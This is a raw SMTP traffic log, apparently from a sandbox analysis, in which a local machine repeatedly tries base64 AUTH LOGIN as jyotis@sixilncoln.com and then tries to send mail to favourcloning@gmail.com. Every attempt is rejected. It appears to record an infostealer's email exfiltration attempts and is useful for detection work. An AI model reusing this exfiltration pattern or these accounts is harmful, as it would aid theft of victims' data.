                                                                          Sep 19, 2024 12:22:19.450445890 CEST58761543208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:19.450773001 CEST61543587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:22:19.729592085 CEST58761543208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:22:19.729820013 CEST61543587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:22:19.909646988 CEST58761543208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:22:20.442325115 CEST58761545208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:20.442517042 CEST61545587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:22:20.598522902 CEST58761545208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:22:20.598757029 CEST61545587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:22:20.772680998 CEST58761545208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:22:21.465183020 CEST58761548208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:21.465351105 CEST61548587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:22:21.624355078 CEST58761548208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:22:21.624597073 CEST61548587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:22:21.906661034 CEST58761548208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:22.462002993 CEST58761549208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:22.464104891 CEST61549587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:22:22.619673967 CEST58761549208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:22:22.619868040 CEST61549587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:22:22.777906895 CEST58761549208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:23.456172943 CEST58761548208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:23.456410885 CEST61548587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:22:23.618108034 CEST58761548208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:22:23.618262053 CEST61548587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:22:24.084027052 CEST58761548208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:22:24.084716082 CEST58761548208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:22:24.501113892 CEST58761549208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:24.501271963 CEST61549587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:22:24.658282042 CEST58761549208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:22:24.660165071 CEST61549587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:22:24.849423885 CEST58761549208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:22:25.613787889 CEST58761552208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:25.613957882 CEST61552587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:22:25.768910885 CEST58761552208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:22:25.769162893 CEST61552587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:22:25.927175045 CEST58761552208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:26.399029016 CEST58761553208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:26.399322987 CEST61553587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:22:26.559828043 CEST58761553208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:22:26.560072899 CEST61553587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:22:26.723054886 CEST58761553208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:28.078761101 CEST58761552208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:28.079190016 CEST61552587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:22:28.083440065 CEST58761553208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:28.083698988 CEST61553587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:22:28.237325907 CEST58761552208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:22:28.237694025 CEST61552587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:22:28.248778105 CEST58761553208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:22:28.248979092 CEST61553587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:22:28.428474903 CEST58761552208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:22:28.489243984 CEST58761553208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:22:29.909409046 CEST58761556208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:29.912358046 CEST61556587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:22:29.953504086 CEST58761557208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:29.956531048 CEST61557587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:22:30.068423986 CEST58761556208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:22:30.072374105 CEST61556587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:22:30.110918999 CEST58761557208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:22:30.111397028 CEST61557587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:22:30.231781960 CEST58761556208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:30.268218040 CEST58761557208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:32.450956106 CEST58761557208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:32.451215982 CEST61557587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:22:32.453272104 CEST58761556208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:32.453649998 CEST61556587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:22:32.608478069 CEST58761557208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:22:32.608995914 CEST61557587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:22:32.616405010 CEST58761556208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:22:32.616688013 CEST61556587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:22:32.785950899 CEST58761557208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:22:32.812859058 CEST58761556208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:22:35.229367971 CEST58761560208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:35.232145071 CEST61560587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:22:35.234932899 CEST58761561208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:35.236201048 CEST61561587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:22:35.392493010 CEST58761560208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:22:35.392528057 CEST58761561208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:22:35.392702103 CEST61560587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:22:35.392740965 CEST61561587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:22:35.551121950 CEST58761561208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:35.556041002 CEST58761560208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:37.766916037 CEST58761561208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:37.766957998 CEST58761560208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:37.767015934 CEST58761561208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:37.767044067 CEST58761560208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:37.767128944 CEST61560587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:22:37.767194033 CEST61561587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:22:37.924055099 CEST58761561208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:22:37.924256086 CEST61561587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:22:37.927795887 CEST58761560208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:22:37.927932024 CEST61560587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:22:38.098335981 CEST58761561208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:22:39.523374081 CEST58761564208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:39.523535967 CEST61564587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:22:39.576838970 CEST58761565208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:39.577367067 CEST61565587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:22:39.680028915 CEST58761564208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:22:39.680213928 CEST61564587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:22:39.731138945 CEST58761565208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:22:39.731313944 CEST61565587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:22:39.838540077 CEST58761564208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:39.887197971 CEST58761565208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:41.082890034 CEST58761565208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:41.083056927 CEST61565587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:22:41.238562107 CEST58761565208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:22:41.238717079 CEST61565587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:22:41.566231966 CEST58761565208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:22:41.566277981 CEST58761564208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:41.566554070 CEST61564587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:22:41.724509954 CEST58761564208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:22:41.724651098 CEST61564587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:22:43.377562046 CEST58761569208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:43.377706051 CEST61569587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:22:43.386826992 CEST58761568208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:43.386977911 CEST61568587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:22:43.538256884 CEST58761569208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:22:43.538407087 CEST61569587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:22:43.547437906 CEST58761568208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:22:43.547597885 CEST61568587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:22:43.698542118 CEST58761569208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:43.712973118 CEST58761568208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:45.090899944 CEST58761568208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:45.091061115 CEST61568587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:22:45.253022909 CEST58761568208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:22:45.253182888 CEST61568587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:22:45.431982040 CEST58761568208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:22:45.446964979 CEST58761569208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:45.447071075 CEST61569587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:22:45.607012033 CEST58761569208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:22:45.607165098 CEST61569587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:22:45.783425093 CEST58761569208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:22:46.929169893 CEST58761572208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:46.929306030 CEST61572587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:22:47.083754063 CEST58761572208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:22:47.083988905 CEST61572587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:22:47.240807056 CEST58761572208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:47.253108978 CEST58761573208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:47.253252983 CEST61573587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:22:47.407512903 CEST58761573208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:22:47.407696009 CEST61573587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:22:47.564616919 CEST58761573208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:49.089854956 CEST58761573208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:49.089870930 CEST58761572208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:49.090012074 CEST61573587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:22:49.090048075 CEST61572587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:22:49.416882038 CEST58761572208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:22:49.416893959 CEST58761573208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:22:49.417052031 CEST61572587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:22:49.417118073 CEST61573587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:22:49.589807034 CEST58761572208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:22:49.593501091 CEST58761573208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:22:51.169150114 CEST58761576208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:51.171051979 CEST61576587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:22:51.182848930 CEST58761577208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:51.184639931 CEST61577587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:22:51.331883907 CEST58761576208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:22:51.340090036 CEST58761577208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:22:51.343743086 CEST61576587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:22:51.351624966 CEST61577587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:22:51.500458002 CEST58761576208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:51.509391069 CEST58761577208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:53.092411041 CEST58761576208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:53.092621088 CEST61576587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:22:53.248186111 CEST58761576208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:22:53.248317957 CEST61576587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:22:53.430733919 CEST58761576208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:22:53.517777920 CEST58761577208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:53.517929077 CEST61577587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:22:53.674249887 CEST58761577208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:22:53.674405098 CEST61577587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:22:53.847511053 CEST58761577208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:22:54.949362040 CEST58761580208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:54.949599981 CEST61580587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:22:55.104407072 CEST58761580208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:22:55.104754925 CEST61580587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:22:55.261563063 CEST58761580208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:55.315076113 CEST58761581208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:55.315206051 CEST61581587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:22:55.472495079 CEST58761581208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
